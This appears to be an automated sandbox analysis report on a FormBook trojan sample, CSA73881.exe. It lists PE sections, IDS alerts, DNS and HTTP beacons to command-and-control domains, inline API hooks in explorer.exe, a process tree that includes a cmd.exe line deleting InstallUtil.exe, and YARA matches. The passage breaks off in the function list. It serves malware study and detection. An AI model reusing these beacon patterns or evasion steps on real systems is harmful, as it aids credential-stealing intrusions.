Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2151b4	0x215200	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x218000	0xa00	0xa00	False	0.425	data	4.28766916412272	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x21a000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x218100	0x2e8	data
RT_GROUP_ICON	0x2183f8	0x14	data
RT_VERSION	0x21841c	0x3a6	data
RT_MANIFEST	0x2187d4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.334.102.136.18049841802031412 08/08/22-14:28:06.715465	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.2.3	34.102.136.180
192.168.2.3103.224.182.21049846802031453 08/08/22-14:29:11.618333	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49846	80	192.168.2.3	103.224.182.210
192.168.2.3103.224.182.21049846802031412 08/08/22-14:29:11.618333	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49846	80	192.168.2.3	103.224.182.210
192.168.2.334.102.136.18049841802031449 08/08/22-14:28:06.715465	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.2.3	34.102.136.180
192.168.2.3103.224.182.21049846802031449 08/08/22-14:29:11.618333	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49846	80	192.168.2.3	103.224.182.210
192.168.2.334.102.136.18049841802031453 08/08/22-14:28:06.715465	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.2.3	34.102.136.180

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2022 14:28:06.695621014 CEST	49841	80	192.168.2.3	34.102.136.180
Aug 8, 2022 14:28:06.714595079 CEST	80	49841	34.102.136.180	192.168.2.3
Aug 8, 2022 14:28:06.714756966 CEST	49841	80	192.168.2.3	34.102.136.180
Aug 8, 2022 14:28:06.715465069 CEST	49841	80	192.168.2.3	34.102.136.180
Aug 8, 2022 14:28:06.734236956 CEST	80	49841	34.102.136.180	192.168.2.3
Aug 8, 2022 14:28:06.831450939 CEST	80	49841	34.102.136.180	192.168.2.3
Aug 8, 2022 14:28:06.831538916 CEST	80	49841	34.102.136.180	192.168.2.3
Aug 8, 2022 14:28:06.831609964 CEST	49841	80	192.168.2.3	34.102.136.180
Aug 8, 2022 14:28:06.831682920 CEST	49841	80	192.168.2.3	34.102.136.180
Aug 8, 2022 14:28:07.143388987 CEST	49841	80	192.168.2.3	34.102.136.180
Aug 8, 2022 14:28:07.160506010 CEST	80	49841	34.102.136.180	192.168.2.3
Aug 8, 2022 14:28:27.360697985 CEST	49844	80	192.168.2.3	75.2.26.18
Aug 8, 2022 14:28:27.379508972 CEST	80	49844	75.2.26.18	192.168.2.3
Aug 8, 2022 14:28:27.382456064 CEST	49844	80	192.168.2.3	75.2.26.18
Aug 8, 2022 14:28:27.382595062 CEST	49844	80	192.168.2.3	75.2.26.18
Aug 8, 2022 14:28:27.401087046 CEST	80	49844	75.2.26.18	192.168.2.3
Aug 8, 2022 14:28:27.562855005 CEST	80	49844	75.2.26.18	192.168.2.3
Aug 8, 2022 14:28:27.562899113 CEST	80	49844	75.2.26.18	192.168.2.3
Aug 8, 2022 14:28:27.563080072 CEST	49844	80	192.168.2.3	75.2.26.18
Aug 8, 2022 14:28:27.563143015 CEST	49844	80	192.168.2.3	75.2.26.18
Aug 8, 2022 14:28:27.577075958 CEST	80	49844	75.2.26.18	192.168.2.3
Aug 8, 2022 14:28:27.578562975 CEST	49844	80	192.168.2.3	75.2.26.18
Aug 8, 2022 14:28:27.581679106 CEST	80	49844	75.2.26.18	192.168.2.3
Aug 8, 2022 14:29:11.449929953 CEST	49846	80	192.168.2.3	103.224.182.210
Aug 8, 2022 14:29:11.616287947 CEST	80	49846	103.224.182.210	192.168.2.3
Aug 8, 2022 14:29:11.618144035 CEST	49846	80	192.168.2.3	103.224.182.210
Aug 8, 2022 14:29:11.618333101 CEST	49846	80	192.168.2.3	103.224.182.210
Aug 8, 2022 14:29:11.821754932 CEST	80	49846	103.224.182.210	192.168.2.3
Aug 8, 2022 14:29:11.822148085 CEST	49846	80	192.168.2.3	103.224.182.210
Aug 8, 2022 14:29:11.822894096 CEST	49846	80	192.168.2.3	103.224.182.210
Aug 8, 2022 14:29:11.988954067 CEST	80	49846	103.224.182.210	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2022 14:27:44.390386105 CEST	50152	53	192.168.2.3	8.8.8.8
Aug 8, 2022 14:27:44.414792061 CEST	53	50152	8.8.8.8	192.168.2.3
Aug 8, 2022 14:28:06.667161942 CEST	56639	53	192.168.2.3	8.8.8.8
Aug 8, 2022 14:28:06.691601038 CEST	53	56639	8.8.8.8	192.168.2.3
Aug 8, 2022 14:28:27.326817036 CEST	62724	53	192.168.2.3	8.8.8.8
Aug 8, 2022 14:28:27.359499931 CEST	53	62724	8.8.8.8	192.168.2.3
Aug 8, 2022 14:28:48.541207075 CEST	55403	53	192.168.2.3	8.8.8.8
Aug 8, 2022 14:28:48.566221952 CEST	53	55403	8.8.8.8	192.168.2.3
Aug 8, 2022 14:29:11.241316080 CEST	54960	53	192.168.2.3	8.8.8.8
Aug 8, 2022 14:29:11.417627096 CEST	53	54960	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 8, 2022 14:27:44.390386105 CEST	192.168.2.3	8.8.8.8	0x8d48	Standard query (0)	www.merendri.com	A (IP address)	IN (0x0001)
Aug 8, 2022 14:28:06.667161942 CEST	192.168.2.3	8.8.8.8	0xc027	Standard query (0)	www.segurambiental.com	A (IP address)	IN (0x0001)
Aug 8, 2022 14:28:27.326817036 CEST	192.168.2.3	8.8.8.8	0xa489	Standard query (0)	www.browardhomeappraisal.com	A (IP address)	IN (0x0001)
Aug 8, 2022 14:28:48.541207075 CEST	192.168.2.3	8.8.8.8	0x6e44	Standard query (0)	www.esrfy.xyz	A (IP address)	IN (0x0001)
Aug 8, 2022 14:29:11.241316080 CEST	192.168.2.3	8.8.8.8	0x6c24	Standard query (0)	www.comgmaik.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 8, 2022 14:27:44.414792061 CEST	8.8.8.8	192.168.2.3	0x8d48	Name error (3)	www.merendri.com	none	none	A (IP address)	IN (0x0001)
Aug 8, 2022 14:28:06.691601038 CEST	8.8.8.8	192.168.2.3	0xc027	No error (0)	www.segurambiental.com	segurambiental.com		CNAME (Canonical name)	IN (0x0001)
Aug 8, 2022 14:28:06.691601038 CEST	8.8.8.8	192.168.2.3	0xc027	No error (0)	segurambiental.com		34.102.136.180	A (IP address)	IN (0x0001)
Aug 8, 2022 14:28:27.359499931 CEST	8.8.8.8	192.168.2.3	0xa489	No error (0)	www.browardhomeappraisal.com		75.2.26.18	A (IP address)	IN (0x0001)
Aug 8, 2022 14:28:27.359499931 CEST	8.8.8.8	192.168.2.3	0xa489	No error (0)	www.browardhomeappraisal.com		99.83.153.108	A (IP address)	IN (0x0001)
Aug 8, 2022 14:28:48.566221952 CEST	8.8.8.8	192.168.2.3	0x6e44	Name error (3)	www.esrfy.xyz	none	none	A (IP address)	IN (0x0001)
Aug 8, 2022 14:29:11.417627096 CEST	8.8.8.8	192.168.2.3	0x6c24	No error (0)	www.comgmaik.com		103.224.182.210	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.segurambiental.com

www.browardhomeappraisal.com

www.comgmaik.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49841	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2022 14:28:06.715465069 CEST	12256	OUT	GET /mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06 HTTP/1.1 Host: www.segurambiental.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 8, 2022 14:28:06.831450939 CEST	12256	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 08 Aug 2022 12:28:06 GMT Content-Type: text/html Content-Length: 291 ETag: "62f0fdc3-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49844	75.2.26.18	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2022 14:28:27.382595062 CEST	12271	OUT	GET /mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06 HTTP/1.1 Host: www.browardhomeappraisal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 8, 2022 14:28:27.562855005 CEST	12271	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Mon, 08 Aug 2022 12:28:27 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49846	103.224.182.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2022 14:29:11.618333101 CEST	12279	OUT	GET /mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 HTTP/1.1 Host: www.comgmaik.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 8, 2022 14:29:11.821754932 CEST	12279	IN	HTTP/1.1 302 Found Date: Mon, 08 Aug 2022 12:29:11 GMT Server: Apache/2.4.38 (Debian) Set-Cookie: __tad=1659961751.8786110; expires=Thu, 05-Aug-2032 12:29:11 GMT; Max-Age=315360000 Location: http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xED
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xED
GetMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xED
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xED

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CSA73881.exePID: 5724, Parent PID: 5252

General

Target ID:	0
Start time:	14:25:09
Start date:	08/08/2022
Path:	C:\Users\user\Desktop\CSA73881.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CSA73881.exe"
Imagebase:	0xde0000
File size:	2187264 bytes
MD5 hash:	3ED3236517A40602D654555BC912D926
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.315621485.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: InstallUtil.exePID: 5408, Parent PID: 5724

General

Target ID:	14
Start time:	14:25:41
Start date:	08/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x8e0000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3968, Parent PID: 5408

General

Target ID:	16
Start time:	14:25:46
Start date:	08/08/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6b8cf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: control.exePID: 3004, Parent PID: 5408

General

Target ID:	28
Start time:	14:26:55
Start date:	08/08/2022
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0x890000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2972, Parent PID: 3004

General

Target ID:	29
Start time:	14:27:01
Start date:	08/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3236, Parent PID: 2972

General

Target ID:	30
Start time:	14:27:02
Start date:	08/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: CSA73881.exePID: 5724, Parent PID: 5252COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	239
Total number of Limit Nodes:	20

Executed Functions

Function 064534C8 Relevance: 1.0, Instructions: 1021COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e7f63caae18d58cced9b13c0a318d87c403351d5973a40138d2779c2e7349b
Instruction ID: 1c53642861d37ecdb8f2782b85349a68e7c27302ef5310fd74dcefe1483781d1
Opcode Fuzzy Hash: d8e7f63caae18d58cced9b13c0a318d87c403351d5973a40138d2779c2e7349b
Instruction Fuzzy Hash: 474242791021587FC3549B62DC01DEB7FADEB47299B135269FAA34B213D62798038BF0

Uniqueness

Uniqueness Score: -1.00%

Function 064510B0 Relevance: .7, Instructions: 728COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f797ddc65058119e5801f78959ba736252ffa609c4ce9040da0ad6abe0f048
Instruction ID: 7139614d60faccca2b93a6e8b1633be4a0074ede7f4b083582a0abe7d703c641
Opcode Fuzzy Hash: 53f797ddc65058119e5801f78959ba736252ffa609c4ce9040da0ad6abe0f048
Instruction Fuzzy Hash: C5623B75A001149FDB55DFA8C984F99BBB2FF48314F1681A9E50AAB362CB31EC51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06456AA0 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7bd61d666d2db23255f53d3eea54534daf6cc941b03ee278eb75d2d3167905f
Instruction ID: c898772b856716b1b853be3b52cb8a5d130aff5881d7ae9d6467015d613f82bc
Opcode Fuzzy Hash: c7bd61d666d2db23255f53d3eea54534daf6cc941b03ee278eb75d2d3167905f
Instruction Fuzzy Hash: 37D1A171E006298BCB55CF98C9806ADFBF1FF48305F56866AD858EB316D734AD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 064510A0 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e47a3678ba7ec0a2ee5823bebed891f4020b747e357af19da7446886a3ceb9f
Instruction ID: 78808c7a96dc3bce7acf54a51a063863fd0862947dc9bb1a6468437cfa9ac6f9
Opcode Fuzzy Hash: 4e47a3678ba7ec0a2ee5823bebed891f4020b747e357af19da7446886a3ceb9f
Instruction Fuzzy Hash: 2ED14970E002289FDB54DFA8C984B9DBBF2BF48304F2185A9E409EB351DB74A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06456A90 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93fc375f74d320c238b241d26c46cf2b02a805fa0f09f2fa4b9c12eebb87a3c5
Instruction ID: 5276879470ae0d4d5c8adfcac83572e96f8e3252d5240964719b756178a10fad
Opcode Fuzzy Hash: 93fc375f74d320c238b241d26c46cf2b02a805fa0f09f2fa4b9c12eebb87a3c5
Instruction Fuzzy Hash: BA917A71E002298BCF54CFA8C9806AEFBF1FF48304F56862AD814FB255D734A946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06453018 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e63f3379f415bfe5a19b1c2c1988e9562afe88612f3b366dac6753e596dd30d
Instruction ID: e50819f675174ca1d33a6d90434aeb737a4d0c582f3551699fad1b5274f55f18
Opcode Fuzzy Hash: 7e63f3379f415bfe5a19b1c2c1988e9562afe88612f3b366dac6753e596dd30d
Instruction Fuzzy Hash: BB919F74A00208CFEB81DF69D4807DAB7F2FB89304F648066D4159B765DB78AD46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06453058 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af32605492fdca4eaa001a886e50d6d8fae26526d2038a2965b071d02401f115
Instruction ID: b456364cb99f227c01e97c1a211336dc1d69c8568b673fe00e3fbef69ba27837
Opcode Fuzzy Hash: af32605492fdca4eaa001a886e50d6d8fae26526d2038a2965b071d02401f115
Instruction Fuzzy Hash: 59817174A00208CFEB80DF59D48469EB7F2FB89304F64C066D8159B769DB78AD46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06459087 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f932e215e252e5076efc45b0c1443b0c8f72c08ffd47db2fed874471f8fef42
Instruction ID: 4a10fd348dd046a5a1abb8909425c27948a872667a5972daa78f5b1cb4421843
Opcode Fuzzy Hash: 8f932e215e252e5076efc45b0c1443b0c8f72c08ffd47db2fed874471f8fef42
